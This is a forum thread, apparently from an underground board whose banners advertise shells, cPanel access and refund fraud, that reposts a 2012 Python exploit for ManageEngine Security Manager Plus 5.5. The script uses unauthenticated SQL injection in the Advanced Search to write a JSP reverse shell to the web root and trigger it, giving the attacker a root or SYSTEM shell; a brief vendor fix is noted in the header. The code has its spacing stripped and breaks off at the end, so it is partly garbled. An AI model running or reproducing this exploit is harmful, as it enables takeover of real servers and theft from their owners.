Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi filter_list
Author
Message
Stricker Offline
Member
Twelve Years of Service
Posts: 203
Threads: 78
Reputation: 0

Points: 0NSP
ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi 10-23-2012, 11:20 AM #1
PHP Code:
#!/usr/bin/python
#
+-----------------------------------------------------------------------
+
#ExploitTitle :SecurityManager
Plus<=5.5build5505RemoteSYSTEM/
rootSQLi(Win+Linux)
#Date :18-10-2012
#Author :xistence
(xistence<[AT]>0x90.nl)
#Softwarelink :http://
www.manageengine.com/products/
security-manager/81779457/
ManageEngine_SecurityManager_Plus.exe
(Win)
#Softwarelink :http://
www.manageengine.com/products/
security-manager/81779457/
ManageEngine_SecurityManager_Plus.zip
(Linux)
#Vendorsite :http://
www.manageengine.com/
#Version :5.5build5505
andlower
#Testedon :CentOS5.x+
WindowsXP/2008
#
#Vulnerability :TheSQL
injectionispossibleonthe"Advanced
Search",theinputisnotvalidated
correctly.Tomakeitevenworse,
# thesearchcanbe
accessedwithoutanyauthentication.
SecurityManagerPlusalsohastorun
asrootorSYSTEMuser,
# whichmakesaremote
shellwithroot/SYSTEMprivileges
possible....
#
#Fix:
#1.GotoSMPserversystemandstop
SMPservice.
#2.DownloadtheSMP_Vul_fix.zipfile
from:http://
bonitas.zohocorp.com/4264259/
scanfi/31May2012/SMP_Vul_fix.zip
#3.Extractthedownloadedfilewhich
containsfourfiles:AdvPMServer.jar,
AdvPMClient.jar,scanfi.jarand
AdventNetPMUnixAgent.jar
#3.Copytheextracted.jarfilesto
<SMP-HOME>\libdirectory(e.g.,C:
\AdventNet\SecurityManager\lib).
[Overwritetheexistingjarfilesand
donotrenamethem]
#4.StarttheSMPservice.
#
+-----------------------------------------------------------------------
+

importurllib,urllib2,cookielib
importsys
importrandom

if(len(sys.argv)!=5):
print""
print"[*]SecurityManagerPlus
5.5build5505andlowerRemote
SYSTEM/rootSQLiexploit(Windows
+Linux)-xistence(xistence<
[at]>0x90.nl)-2012-05-29"
print""
print"[*]Usage:secman-sql.py
<RHOST><LHOST><LPORT><OS>"
print"[*]I.e.: ./secman-sql.py
www.linux.org192.168.2.668888linux"
print"[*]I.e.: ./secman-sql.py
www.microsoft.com192.168.2.668888
win"
print"[*]"
print"[*]RHOST=RemoteHost
whichrunsSecurityManagerPlus"
print"[*]LHOST=IPaddressof
localmachine(machinewhereyourun
theexploitfrom"
print"[*]LPORT=Portonthe
localmachinewhereyouwillrunNCon
forourreverseshell"
print"[*]OS=linux/win"
print""
print""
exit(0)
rhost=sys.argv[1]
lhost=sys.argv[2]
lport=sys.argv[3]
osys=sys.argv[4]
ifosys=='linux':
command="/bin/bash"
elifosys=='win':
command="cmd.exe"
else:
print"ChooseavalidOS,linux/
win"
exit()
filename=''
foriinrandom.sample
('abcdefghijklmnopqrstuvwxyz1234567890',6):
filename+=i
filename+=".jsp"
output_path="../../webapps/
SecurityManager/%s"%filename
jsp=''' <%@page
import="java.lang.*"%>
<%@page
import="java.util.*"%>
<%@page
import="java.io.*"%>
<%@page
import="java.net.*"%>
<%
classStreamConnector
extendsThread
{
InputStreamis;
OutputStreamos;
StreamConnector
(InputStreamis,OutputStreamos)
{
this.is=is;
this.os=os;
}
publicvoidrun()
{
BufferedReader
in =null;
BufferedWriter
out=null;
try
{
in =new
BufferedReader(newInputStreamReader
(this.is));
out=new
BufferedWriter(newOutputStreamWriter
(this.os));
char
buffer[]=newchar[8192];
int
length;
while
((length=in.read(buffer,0,
buffer.length))>0)
{
out.write
(buffer,0,length);
out.flush
();
}
}catch
(Exceptione){}
try
{
if(in!=
null)
in.close
();
if(out!=
null)
out.close
();
}catch
(Exceptione){}
}
}
try
{
Socketsocket=
newSocket("'''+lhost+'''",
'''+lport+''');
Processprocess=
Runtime.getRuntime().exec
("'''+command+'''");
(new
StreamConnector
(process.getInputStream(),
socket.getOutputStream())).start();
(new
StreamConnector(socket.getInputStream
(),process.getOutputStream
())).start();
}catch(Exceptione)
{}
%>'''
jsp=jsp.replace("\n","")
jsp=jsp.replace("\t","")
payload="1))"
payload+='UNIONSELECT0x
%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29
INTOOUTFILE"%s"'%(jsp.encode
('hex'),output_path)
payload+="FROMmysql.userWHERE1=
((1"
opener=urllib2.build_opener()
opener.addheaders.append(('Cookie',
'STATE_COOKIE=%26SecurityManager%2FID
%2F174%2FHomePageSubDAC_LIST
%2F223%2FSecurityManager_CONTENTAREA_LIST
%2F226%2FMainDAC_LIST%2F166%26MainTabs
%2FID%2F167%2F_PV%2F174%2FselectedView
%2FHome%26Home%2FID%2F166%2FPDCA
%2FMainDAC%2F_PV%2F174%26HomePageSub
%2FID%2F226%2FPDCA
%2FSecurityManager_CONTENTAREA%2F_PV
%2F166%26HomePageSubTab%2FID
%2F225%2F_PV%2F226%2FselectedView
%2FHomePageSecurity%26HomePageSecurity
%2FID%2F223%2FPDCA%2FHomePageSubDAC
%2F_PV%2F226%26_REQS%2F_RVID
%2FSecurityManager%2F_TIME%2F31337;
2RequestsshowThreadedReq=showThreadedReqshow;
2RequestshideThreadedReq=hideThreadedReqhide;'))
post_params=urllib.urlencode
({'ANDOR':'and','condition_1':
'OpenPorts@PORT','operator_1':'IN',
'value_1':payload,'COUNT':'1'})
print"[*]Sendingevilpayload"
resp=opener.open("http://%s:6262/
STATE_ID/31337/jsp/xmlhttp/
persistence.jsp?
reqType=AdvanceSearch&SUBREQUEST=XMLHTTP"
%rhost,post_params)
print"[*]CreatedReverseJSPshell
http://%s:6262/%s"%(rhost,filename)
resp=opener.open("http://%s:6262/
%s" %(rhost,filename))
print"[*]Checkyourshellon%s%s
\n"%(lhost,lport
[Image: deceptionorangeoverlay.png]

Reply







Users browsing this thread: 1 Guest(s)